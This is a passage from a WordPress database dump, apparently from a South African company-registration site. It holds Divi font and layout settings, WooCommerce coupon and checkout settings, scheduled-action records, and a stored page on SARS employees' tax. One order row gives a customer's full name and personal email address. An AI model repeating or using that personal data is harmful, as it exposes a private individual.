:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20239,33225,'_cart_discount_tax','0'),(20240,33225,'_order_shipping','0.00'),(10083,78,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"devanagari\";}}'),(10135,77,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20221,33135,'wcf-pre-checkout-offer-product','a:1:{i:0;s:5:\"29583\";}'),(10187,70,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(10239,65,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20219,33220,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566653473;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20188,33199,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566609689;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(10291,67,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20512,33360,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566894255;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(10343,69,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:4:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:5;s:10:\"devanagari\";}}'),(10395,68,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20253,33225,'es_wc_activecampaign_opt_in','no'),(10447,72,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20157,33168,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566540913;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(10499,79,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20233,33225,'_billing_first_name','Imraan'),(20234,33225,'_billing_last_name','Wajoodeen'),(20235,33225,'_billing_email','imraanmaw@gmail.com'),(10551,80,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20415,33330,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566828108;}'),(10604,28088,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20190,33201,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566614587;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(10707,28091,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20191,33202,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566614587;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(10759,28092,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"devanagari\";}}'),(10861,29047,'_edit_lock','1523950640:3'),(10862,29047,'_edit_last','3'),(10863,29047,'_wp_page_template','default'),(10864,29047,'_et_pb_post_hide_nav','default'),(10865,29047,'_et_pb_page_layout','et_right_sidebar'),(10866,29047,'_et_pb_side_nav','off'),(10867,29047,'_et_pb_use_builder','on'),(10868,29047,'_et_builder_version','VB|Divi|3.0.97'),(10869,29047,'_et_pb_ab_stats_refresh_interval','hourly'),(10870,29047,'_et_pb_old_content',''),(10871,29047,'_et_pb_enable_shortcode_tracking',''),(10872,29047,'_et_pb_custom_css',''),(10873,29047,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:1;s:10:\"devanagari\";i:2;s:9:\"latin-ext\";}}'),(10880,29047,'_et_pb_use_ab_testing','off'),(10881,29047,'_et_pb_ab_subjects',''),(10882,29047,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"29047\" /]'),(10883,571,'_et_pb_built_for_post_type','page'),(10935,4,'_et_pb_built_for_post_type','page'),(10936,184,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20287,33233,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566652287;}'),(11053,74,'yikes_woo_products_tabs','a:0:{}'),(11157,29109,'_wp_attached_file','woocommerce_uploads/2016/03/WHAT-I-NEED-TO-KNOW-BEFORE-I-START-MY-BUSINESS-IN-SOUTH-AFRICA.pdf'),(11158,80,'yikes_woo_products_tabs','a:0:{}'),(11159,27847,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11160,99,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:4:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:5;s:10:\"devanagari\";}}'),(11161,295,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(11162,28799,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11163,144,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"devanagari\";}}'),(11164,319,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11165,309,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11166,29111,'_edit_lock','1526285827:3'),(11167,29111,'_edit_last','3'),(11168,319,'_et_post_bg_color','#ffffff'),(11169,319,'_et_post_bg_layout','light'),(11170,319,'_et_pb_show_title','on'),(11171,319,'_et_pb_post_hide_nav','default'),(11172,319,'_et_pb_page_layout','et_right_sidebar'),(11173,319,'_et_pb_side_nav','off'),(11174,319,'_et_pb_use_builder',''),(11175,319,'_et_builder_version','BB|Divi|3.2.1'),(11176,319,'_et_pb_ab_stats_refresh_interval','hourly'),(11177,319,'_et_pb_old_content',''),(11178,319,'_et_pb_enable_shortcode_tracking',''),(11179,319,'_et_pb_custom_css',''),(11180,29111,'_wp_page_template','default'),(11181,29111,'_et_pb_post_hide_nav','default'),(11182,29111,'_et_pb_page_layout','et_right_sidebar'),(11183,29111,'_et_pb_side_nav','off'),(11184,29111,'_et_pb_use_builder','on'),(11185,29111,'_et_builder_version','VB|Divi|3.2.2'),(11186,29111,'_et_pb_ab_stats_refresh_interval','hourly'),(11187,29111,'_et_pb_old_content',''),(11188,29111,'_et_pb_enable_shortcode_tracking',''),(11189,29111,'_et_pb_custom_css',''),(11190,29111,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(11191,29111,'_et_pb_built_for_post_type','page'),(11192,29111,'_et_pb_use_ab_testing','off'),(11194,29111,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"29111\" /]'),(11195,29115,'_et_pb_row_layout','4_4'),(11196,29115,'_et_pb_built_for_post_type','page'),(11203,29011,'_et_pb_built_for_post_type','page'),(11204,397,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11205,109,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19730,33130,'_edit_lock','1566650576:1'),(19731,33130,'_edit_last','1'),(19732,33130,'wcf-testing','no'),(19733,33130,'wcf-steps','a:2:{i:0;a:3:{s:2:\"id\";i:33131;s:5:\"title\";s:32:\"SA Company Registration Checkout\";s:4:\"type\";s:8:\"checkout\";}i:1;a:3:{s:2:\"id\";i:33132;s:5:\"title\";s:15:\"Thank You CoReg\";s:4:\"type\";s:8:\"thankyou\";}}'),(19737,33131,'theme-transparent-header-meta','default'),(11206,397,'_et_post_bg_color','#ffffff'),(11207,397,'_et_post_bg_layout','light'),(11208,397,'_et_pb_show_title','on'),(11209,397,'_et_pb_post_hide_nav','default'),(11210,397,'_et_pb_page_layout','et_right_sidebar'),(11211,397,'_et_pb_side_nav','off'),(11212,397,'_et_builder_version','BB|Divi|3.2.1'),(11214,369,'_et_post_bg_color','#ffffff'),(11215,369,'_et_post_bg_layout','light'),(11216,369,'_et_pb_show_title','on'),(11217,369,'_et_pb_post_hide_nav','default'),(11218,369,'_et_pb_page_layout','et_right_sidebar'),(11219,369,'_et_pb_side_nav','off'),(11220,369,'_et_pb_use_builder','on'),(11221,369,'_et_builder_version','BB|Divi|3.2.1'),(11222,369,'_et_pb_ab_stats_refresh_interval','hourly'),(11223,369,'_et_pb_old_content','<p>[su_spoiler title=\"What is it?\" style=\"fancy\"]</p><p>Employees’ Tax refers to the tax required to be deducted by an employer from an employee’s remuneration paid or payable. The process of deducting or withholding tax from remuneration as it is earned by an employee is commonly referred to as PAYE.</p><p>An employer who is registered or required to register with SARS for PAYE and/or Skills Development Levy (SDL) purposes, is also required to register with SARS for the payment of Unemployment Insurance Fund (UIF) contributions to SARS.[/su_spoiler]</p><p>[su_spoiler title=\"What\'s New?\" style=\"fancy\"] 1 September 2015 - Employer Interim Reconciliation is open from 1 September to 30 October 2015 for the period 1 March to 31 August 2015<br /> 1 September 2015 - PAYE Reconciliation Communication: Clarification for August 2015 IRP5/IT3(a) Certificates [/su_spoiler]</p><p>[su_spoiler title=\"Who is it for?\" style=\"fancy\"] The amounts deducted or withheld must be paid by the employer to SARS on a monthly basis, by completing the Monthly Employer Declaration (EMP201). The EMP201 is a payment declaration in which the employer declares the total payment together with the allocations for PAYE, SDL, UIF and/or Employment Tax Incentive (ETI), if applicable. A unique Payment Reference Number (PRN) will be pre-populated on the EMP201, and will be used to link the actual payment with the relevant EMP201 payment declaration [/su_spoiler]</p><p>[su_spoiler title=\"How and when should it be paid?\" style=\"fancy\"] It must be paid within seven days after the end of the month during which the amount was deducted. If the last day for payment falls on a public holiday or weekend, the payment must be made on the last business day before the public holiday or weekend. [/su_spoiler]</p><p>[su_spoiler title=\"The following payment methods are available:\" style=\"fancy\"]</p><ul><li>Electronic payments through the internet (EFT)</li><li>At a branch of one of the relevant approved banking institutions. Cheque payments may not exceed R50 000. This limit applies irrespective of the number of tax periods being paid, or should multiple cheque payments be made.</li><li>At a specific SARS branch, cheque payments may not exceed R50 000. This limit applies irrespective of the number of tax periods being paid, or should multiple cheque payments be made.[/su_spoiler]</li></ul><h4>Note:</h4><p>Employers who pay, or are likely to pay Employees’ Tax exceeding R10 million in any 12-month period, must submit Employees’ Tax declarations and make payments electronically.</p>'),(11224,369,'_et_pb_enable_shortcode_tracking',''),(11225,369,'_et_pb_custom_css',''),(11237,2,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19660,33039,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566346070;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(11238,2,'_et_pb_built_for_post_type','page'),(11239,2,'_et_pb_use_ab_testing','off'),(11240,2,'_et_pb_ab_subjects',''),(11241,2,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"2\" /]'),(11242,29111,'_et_pb_ab_subjects',''),(11243,29161,'_edit_lock','1526302848:1'),(11244,29161,'_edit_last','1'),(11245,29161,'discount_type','percent'),(11246,29161,'coupon_amount','20'),(11247,29161,'individual_use','yes'),(11248,29161,'product_ids',''),(11249,29161,'exclude_product_ids',''),(11250,29161,'usage_limit','0'),(11251,29161,'usage_limit_per_user','0'),(11252,29161,'limit_usage_to_x_items','0'),(11253,29161,'usage_count','0'),(11254,29161,'date_expires',NULL),(11255,29161,'expiry_date',''),(11256,29161,'free_shipping','no'),(11257,29161,'product_categories','a:0:{}'),(11258,29161,'exclude_product_categories','a:0:{}'),(11259,29161,'exclude_sale_items','no'),(11260,29161,'minimum_amount','1500'),(11261,29161,'maximum_amount',''),(11262,29161,'customer_email','a:0:{}'),(11263,571,'_et_pb_ab_subjects',''),(11299,335,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20134,33145,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566489555;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(11417,293,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:4;s:10:\"devanagari\";}}'),(11431,128,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19689,33068,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566412062;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(11432,105,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(11433,324,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20215,33135,'wcf-pre-checkout-offer-popup-skip-btn-text','No, thanks!'),(11434,267,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20220,33221,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566653473;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(11435,329,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19719,33099,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566473711;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(11436,28613,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"devanagari\";}}'),(11437,314,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19738,33131,'_uabb_lite_converted','yes'),(19739,33131,'enable-to-import','1'),(19740,33131,'_et_pb_dark_text_color','#7a7a7a'),(19741,33131,'_et_pb_built_for_post_type','page'),(11438,322,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20183,33194,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566596332;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(11439,369,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20231,33225,'_created_via','checkout'),(20232,33225,'_cart_hash','b1359800010328ce6b65f1d0a2126d71'),(11440,83,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20217,33135,'wcf-pre-checkout-offer-discount-value','20%'),(20218,33135,'wcf-pre-checkout-offer-bg-color','#eee'),(11441,91,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:4:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:5;s:10:\"devanagari\";}}'),(11442,103,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(11443,114,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20214,33135,'wcf-pre-checkout-offer-popup-btn-text','Yes, Add to My 